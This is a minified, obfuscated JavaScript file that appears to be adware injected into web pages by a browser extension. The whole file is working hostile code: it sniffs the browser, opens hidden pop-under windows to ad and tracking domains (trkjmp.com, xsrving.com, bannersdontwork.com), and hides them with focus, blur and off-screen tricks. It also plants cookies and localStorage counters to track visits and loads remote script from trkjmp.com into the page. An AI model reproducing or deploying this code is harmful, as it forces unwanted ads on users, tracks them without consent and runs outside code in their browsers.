!function(s,X,E,Ga,Y,h,Ha,ja,Z,ka,la,Ia,$,ma,Ja,F,na,Ka,La,cb,G,oa,Ma,j,db,pa,H,qa,ra,aa,Na,eb,Oa,Pa,I,Qa,sa,ta,Ra,y,t,ba,u,v,J,ca,A){function l(a,c,b){if(d[la])a[la](c,b,!1);else a[Ia](qa+c,b)}function K(a){a=d[Oa][Ra][sa]().match(Ha(a+"[/ ](\\d+)","i"));return h(a&&a[1],10)}function da(a,c,b){a=a[ra](c!=Y?c:ka+":"+$,b!=Y?b:"_"+$);k(a,j);k(a,Ka);return a}function ua(a,c){a=h(a,10);isNaN(a)&&(a=h(L&&L.getItem(c)||_GPL.gc(c,10),10)||0);return a}function k(a,c){try{a[c]()}catch(b){}}function M(){var a;
if(a=N){a=na+"Height";var c=na+"Width";a=E(768,h(d.innerHeight||va[a]||O[a],10)||0,10);c=E(1024,h(d.innerWidth||va[c]||O[c],10)||0);a="left="+(d[I+"Left"]||d[I+"X"])+",top="+(d[I+"Top"]||d[I+"Y"])+",width="+c+",height="+a+",status=true,toolbar=false,menubar=true,resizable=true,location=false,directories=no,scrollbars=true,copyhistory=no";a=d[ra](_GPL.proto+_GPL.baseCDN+"/p.html?u="+encodeURIComponent(wa),"ld893_"+(B?"_"+encodeURIComponent(B)+"_":"")+"_"+z(),a)}if(C=a)if(N=!1,a=z(),n&&xa(y,n,a),q.set(A,
++r),D&&D.now&&q.get([J],function(a){a=a.v[J]&&JSON.parse(a.v[J])||{};var b=new s(D.now),c=ya(b),b=b.getHours(),d=[0,0],g=h(D.score,10);a[c]||(a[c]={});a[c][b]||(a[c][b]=d);a[c][b][0]++;a[c][b][1]+=g;q.set(J,JSON.stringify(ea(a)))}),w&&xa(t,w,P+(P&&",")+x+":"+a),p){k(C[aa],j);za&&Q(function(){k(C,ma);k(C[aa],j);k(d,j)},0,100,3);if(Sa){k(C[aa],j);k(d,j);var b;Q(function(){!b&&!R&&(b=!0,da(d),b=!1)},0,100,3);Q(function(a){a=G+"top:1919238;"+G+"left:1919238;"+G+"width:1;"+G+"height:1";if(!b&&!R)d[Qa](La,
Y,a)},250,1E3,3)}(S||za||Ta)&&Q(function(){R||k(d,j)},100,1500,10)}}function Ua(){p&&(p=!1,da(d,"",""))}function Va(){if(p){p=!1;var a=g.createElement("div"),c=a.cloneNode(),b="_"+Ga();a.innerHTML='<iframe name="'+b+'" frameborder=0 src="'+ka+":"+$+'" style="display:none !important"></iframe>';c.innerHTML='<form target="'+b+'" style="display:none"><input type="submit"></form>';a=a.firstChild;a.appendChild(c.firstChild);var e=a.firstChild;l(g,H+ta,function(){N&&(e.submit(),M(),da(top))});O.appendChild(a)}}
function Q(a,c,b,e){for(e=E(1,(b-c)/(e-1||1));c<=b;c+=e)ja(a,X(c))}function z(){return X(new s/1E3)}function xa(a,c,b){q.set(a,b);b=z();L&&L.setItem(a,b);c=h(c/3600,10);var e=new s;e.setHours(e.getHours()+c);g.cookie=a+"="+b+";expires="+e.toUTCString()+";path=/;domain="+x}function Wa(a){var c=[0,0],b;for(b in a)if(b.match(/^\d{8}$/))for(var e in a[b])e.match(/^\d{1,2}$/)&&2==a[b][e].length&&(c[0]+=h(a[b][e][0],10),c[1]+=h(a[b][e][1],10));return 0<c[0]?Math.floor(c[1]/c[0]):0}function Xa(a){var c=
[0,0],b;for(b in a)if(b.match(/^\d{8}$/))for(var e in a[b])e.match(/^\d{1,2}$/)&&(c[0]+=1,c[1]+=h(a[b][e],10));return 0<c[0]?Math.floor(c[1]/c[0]):0}function ya(a){var c=Z(a.getFullYear()),b=Z(a.getMonth()+1);a=Z(a.getDate());return c+(b[1]?b:"0"+b[0])+(a[1]?a:"0"+a[0])}function ea(a){var c=[],b;for(b in a)a.hasOwnProperty(b)&&b.match(/^\d{8}$/)&&c.push(b);var c=c.sort().reverse().slice(0,7),e={};for(b in a)-1<c.indexOf(b)&&(e[b]=a[b]);return e}if(_GPL.canLoad("ld893"))_GPL.items.z7b85=!1;else{var q=
_GPL.items.e6a00,d,Aa=window,m=Aa,fa=m.unsafeWindow;if(m._GPL_internal)if(fa&&!fa.appAPI)m=fa;else if(m.appAPI){var Ba=g.createElement("div");l(Ba,F,function(){return window});m=Ba[qa+F]();m.appAPI&&(m=Aa)}d=m;var g=d.document,va=g.documentElement||g,O=g.body,L=d.localStorage,S=K(Ja),Sa=K(Ma),za=!!g.all,Ta=K(Na),ga=K(Pa),Ca=_GPL.item_vars["22555_ch"]||_GPL.item_vars.ch||"",n,T="x"==Ca,w,N=!1,p=!1,x,wa,C,R=!1,P="",r=0,U,V=0,D={},B="";if(!_GPL.gc(ba)){var ha=[],Da=d[pa].hostname[sa]().replace(/^www\./i,
""),W=Da.split("."),Ya=W.join(".").match(/\.[a-z]{2,3}\.[a-z]{2}$/i)?3:2;do{var Za=W.join(".");ha.push(Za);W.shift()}while(W.length>=Ya);x=ha.length?ha.pop():Da;T?(U=n=0,w=3600,y+="_xr",t+="_xr",A+="_xr"):(n=10800,U=3,w=86400);var Ea=function(a,c){wa=c;N=!0;if(a){var b=function(a){R=a.type==j};p=!0;l(d,j,b);l(d,ma,b);if(25>S||536>ga)l(g,H+oa,M),l(g,H+ta,Ua);(24<S||535<ga)&&l(g,H+oa,Va);!S&&!ga&&l(O,F,M)}else l(g,F,M)},ia="&ch="+encodeURIComponent(Ca),$a=encodeURIComponent(_GPL.B64.encode(encodeURIComponent(d[pa].href.substr(0,
500))+"::z-"+_GPL.vars.pid+"-"+_GPL.zoneid("z7b85"))),Fa=_GPL.proto+"p.trkjmp.com/pops?c="+$a+ia,ab="http://secure.xsrving.com/display?size=800x600"+ia+"&referer="+encodeURIComponent(x),bb="http://serve.bannersdontwork.com/serve?size=800x600"+ia+"&referer="+encodeURIComponent(x);_GPL.items.z7b85={callback:function(a){B="";if(a)if(a.cid&&(B=a.cid,a.url||(a.url=_GPL.proto+"p.trkjmp.com/click?c="+encodeURIComponent(B))),a.url&&("undefined"!=typeof a.score&&h(a.score,10)>=V)&&(D={score:a.score,now:new s/
1},Ea("u"==a.t,a.url,a.score)),"undefined"!=typeof a.score){if(!T){var c=h(a.score,10);_GPL.sc(ca,c,1);q.get([u,v],function(a){var e=a.v[u]&&JSON.parse(a.v[u])||{};a=a.v[v]&&JSON.parse(a.v[v])||{};var d=new s,f=ya(d),d=d.getHours(),g=[0,0];e[f]||(e[f]={});e[f][d]||(e[f][d]=g);a[f]||(a[f]={});a[f][d]||(a[f][d]=0);0<c&&(e[f][d][0]++,e[f][d][1]+=c,c>h(a[f][d])&&(a[f][d]=c));q.set(u,JSON.stringify(ea(e)));q.set(v,JSON.stringify(ea(a)))})}}else _GPL.sc(ba,z(),6)}};!function c(){_GPL.gc(ba)||q.get(["frt",
y,t,A,u,v],function(b){if(b.v.frt){var e=z(),d=0,f=ua(b.v[y],y),g=(new s(1E3*f)).getUTCDate()!=(new s(1E3*e)).getUTCDate();r=h(b.v[A],10);r=isNaN(r)?0:r;g&&f&&(r=0);if(!U||!r||e-f>=n&&r<U){var j=b.v[t],d={},g=z(),l=[],j=(j||"").split(",");if(j.length){for(var k=0;k<j.length;++k){var m=j[k].split(":"),p=h(m[1],10);g-p<w&&(d[m[0]]=p,l.push(m[0]+":"+p))}P=l.join(",");q.set(t,P)}d=ua(d[x],t);if(e-d>=w||!r){T?Ea(!0,ab,0):"facebook.com"==x?_GPL.items.z7b85.callback({url:bb,t:"u",score:0}):(f&&n&&(d=b.v[u]&&
JSON.parse(b.v[u])||{},b=b.v[v]&&JSON.parse(b.v[v])||{},V=Math.max(Xa(b),Wa(d)),f=e>=f+n?1-Math.min((e-(f+n))/n,1):1,V=X(f*V)),_GPL.insertJS(Fa+"&a=1&r="+e));return}}ja(c,1E3*(5+E(e,f+n,d+w)-e));T||(null!=_GPL.gc(ca)?(e=h(_GPL.gc(ca),10),_GPL.items.z7b85.callback({score:e})):_GPL.insertJS(Fa+"&r="+e))}})}()}}}(Date,Math.floor,Math.max,Math.random,null,parseInt,RegExp,setTimeout,String,"about","addEventListener","attachEvent","blank","blur","chrome","click","client","close","javascript:window.close()",
"contentDocument","dialog","down","firefox","focus","load","location","mouse","on","open","opener","opera","over","navigator","safari","screen","showModalDialog","toLowerCase","up","userAgent","ld893_pop_g","ld893_pop_s","ld893_bl","ld893_o","ld893_o_max","ld893_o_win","ld893_s","ld893_pop_gs");